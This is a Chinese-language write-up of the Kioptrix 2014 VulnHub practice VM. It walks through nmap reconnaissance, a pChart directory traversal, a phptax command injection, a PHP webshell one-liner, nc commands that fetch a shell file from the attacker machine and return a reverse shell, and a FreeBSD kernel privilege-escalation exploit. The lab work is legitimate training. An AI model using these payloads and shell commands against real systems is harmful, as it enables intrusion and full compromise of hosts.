# 靶场搭建
下载: https://download.vulnhub.com/kioptrix/kiop2014.tar.bz2
添加一张 NAT 模式的网卡,IP 地址: 192.168.74.137
# 信息收集
# nmap
快速全端口探测
┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:50 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00032s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: 00:0C:29:07:5D:F9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 104.77 seconds
针对这三个端口进一步探测
┌──(root㉿kali)-[~]
└─# nmap 192.168.74.137 -p 22,80,8080 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 09:53 EDT
Nmap scan report for 192.168.74.137
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:07:5D:F9 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds
22 端口是关闭的,但是还是探测得到,估计是 8080 端口代理进行的
# 80 页面
打开瞅了一眼 80 端口,在源代码中看到了提示
<head> | |
<!-- | |
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php"> | |
--> | |
</head> |
看到有 pChart,搜一下有没有漏洞
┌──(root㉿kali)-[~] | |
└─# searchsploit pchart | |
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- | |
Exploit Title | Path | |
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- | |
pChart 2.1.3 - Multiple Vulnerabilities | php/webapps/31173.txt | |
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- | |
Shellcodes: No Results | |
Papers: No Results |
还真有
# 汇总
- pChart2.1.3 漏洞
- Apache2.2.21
- ssh 暴力破解
- http 代理(可能是 reGeorge
# 漏洞利用
# pChart
查看漏洞:
┌──(root㉿kali)-[~/Desktop] | |
└─# cat 31173.txt | |
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS | |
# Date: 2014-01-24 | |
# Exploit Author: Balazs Makany | |
# Vendor Homepage: www.pchart.net | |
# Software Link: www.pchart.net/download | |
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3" | |
# Version: 2.1.3 | |
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache) | |
# CVE : N/A | |
[0] Summary: | |
PHP library pChart 2.1.3 (and possibly previous versions) by default | |
contains an examples folder, where the application is vulnerable to | |
Directory Traversal and Cross-Site Scripting (XSS). | |
It is plausible that custom built production code contains similar | |
problems if the usage of the library was copied from the examples. | |
The exploit author engaged the vendor before publicly disclosing the | |
vulnerability and consequently the vendor released an official fix | |
before the vulnerability was published. | |
[1] Directory Traversal: | |
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd" | |
The traversal is executed with the web server's privilege and leads to | |
sensitive file disclosure (passwd, siteconf.inc.php or similar), | |
access to source codes, hardcoded passwords or other high impact | |
consequences, depending on the web server's configuration. | |
This problem may exists in the production code if the example code was | |
copied into the production environment. | |
Directory Traversal remediation: | |
1) Update to the latest version of the software. | |
2) Remove public access to the examples folder where applicable. | |
3) Use a Web Application Firewall or similar technology to filter | |
malicious input attempts. | |
[2] Cross-Site Scripting (XSS): | |
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script> | |
This file uses multiple variables throughout the session, and most of | |
them are vulnerable to XSS attacks. Certain parameters are persistent | |
throughout the session and therefore persists until the user session | |
is active. The parameters are unfiltered. | |
Cross-Site Scripting remediation: | |
1) Update to the latest version of the software. | |
2) Remove public access to the examples folder where applicable. | |
3) Use a Web Application Firewall or similar technology to filter | |
malicious input attempts. | |
[3] Disclosure timeline: | |
2014 January 16 - Vulnerability confirmed, vendor contacted | |
2014 January 17 - Vendor replied, responsible disclosure was orchestrated | |
2014 January 24 - Vendor was inquired about progress, vendor replied | |
and noted that the official patch is released. |
看一下具体的漏洞位置,发现是任意文件读取: http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
就读到了文件
还有一个 XSS,没啥太大意义
那么现在手里面只有一个文件包含的漏洞,要想办法组合收集更多的信息,通过 LFI 去找信息
目前明确知道机器上运行着 apache,那就去查看配置文件: http://192.168.74.137/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
<IfModule ssl_module> | |
SSLRandomSeed startup builtin | |
SSLRandomSeed connect builtin | |
</IfModule> | |
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser | |
<VirtualHost *:8080> | |
DocumentRoot /usr/local/www/apache22/data2 | |
<Directory "/usr/local/www/apache22/data2"> | |
Options Indexes FollowSymLinks | |
AllowOverride All | |
Order allow,deny | |
Allow from env=Mozilla4_browser | |
</Directory> | |
</VirtualHost> | |
Include etc/apache22/Includes/*.conf |
看到 8080 端口需要通过 Mozilla4_browser
进行访问
┌──(root㉿kali)-[~]
└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>
看到有一个 phptax 的目录,瞧一眼呢
└─# curl -H "User-Agent:Mozilla/4.0" http://192.168.74.137:8080/phptax/
出来一堆组件,这个 phptax 估计是个 CMS,直接搜一下攻击模块
msf6 > search phptax | |
Matching Modules | |
================ | |
# Name Disclosure Date Rank Check Description | |
- ---- --------------- ---- ----- ----------- | |
0 exploit/multi/http/phptax_exec 2012-10-08 excellent Yes PhpTax pfilez Parameter Exec Remote Code Injection | |
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/phptax_exec |
# phptax
msf 直接利用没有合适的 payload,这就很傻逼了
searchsploit 查了一下有记录,是有一个 RCE
----------------------------------------------------
drawimage.php, line 63:
include ("./files/$_GET[pfilez]");
// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
----------------------------------------------------
Exploit / Proof of Concept:
Bindshell on port 23235 using netcat:
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
----------------------------------------------------
可以看到在 pfilez 参数有 RCE,通过 ;
可以将语句闭合进行执行,给出了 Exp,但是尝试了一下没有办法直接使用,查阅了资料,发现了原因
NC 的 FreeBSD 版本没有附带 execute 选项,这意味着我无法用它获得反向 shell。
参考:https://blog.techorganic.com/2014/04/08/kioptrix-hacking-challenge-part-5/
那么想法自然而然就是上传一个 shell 去运行,最简单的就是上传一个一句话: http://192.168.74.137:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php echo system($_GET["cmd"]) ?>' > 1.php;&pdf=make
可以执行系统命令了
wget 目标机器不存在,但是存在 nc,尝试通过 nc 传递数据
# 监听请求 | |
┌──(root㉿kali)-[~] | |
└─# nc -l -p 8888 < shell.php | |
# 监听回弹 | |
┌──(root㉿kali)-[~] | |
└─# nc -lvp 1234 |
RCE: http://192.168.74.137:8080/phptax/1.php?cmd=nc 192.168.74.129 8888 > shell.php
写入 shell.php 之后直接访问执行,就会回弹 shell
┌──(root㉿kali)-[~] | |
└─# nc -lvp 1234 | |
listening on [any] 1234 ... | |
Warning: forward host lookup failed for bogon: Unknown host | |
connect to [192.168.74.129] from bogon [192.168.74.137] 19685 | |
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64 | |
3:03AM up 2:26, 0 users, load averages: 0.11, 0.11, 0.04 | |
USER TTY FROM LOGIN@ IDLE WHAT | |
uid=80(www) gid=80(www) groups=80(www) | |
sh: can't access tty; job control turned off | |
$ whoami | |
www |
但是低权限,要提权
# 提权
uname -a
查看一下机器的内核,发现是 FreeBSD 9.0
,直接 searchsploit 搜一下看看有没有提权脚本,有的,直接传上去,通过他机器上的 gcc 编译出来
http://192.168.74.137:8080/phptax/1.php?cmd=nc%20192.168.74.129%208888%20%3E%2028718.c
http://192.168.74.137:8080/phptax/1.php?cmd=gcc%20-o%20exploit%2028718.c
28718.c
这个提权的方法在目标机器上编译的时候我这里出现了问题,所以我用了另外一个 26368.c
传上去之后直接 gcc 编译,运行 a.out
就直接拿到了 root 权限
$ gcc exp.c | |
exp.c:89:2: warning: no newline at end of file | |
$ ./a.out | |
whoami | |
root |
# 小结
出现了很多次意想不到的情况,自己心里想的方法总是不能如鱼得水的应用,在拿到一句话后,想要反弹 shell,但是由于对工具的不熟悉以及反弹方式底层逻辑的缺失导致浪费了大量时间,目标机器没有 wget 后就不知道该如何进行传递,常用的工具应用的并不像自己认为的那样熟练,还是要加强练习。
一些具体的失败原因仍然没有能力刨根问题,例如提权的过程中为什么 28718.c
编译后无法运行?反弹 shell 的过程中,为什么有很多次没有正常进行会话。这些都需要对操作系统层面和工具的设计以及网络通讯基础具有深刻的理解才能解答。
任重而道远……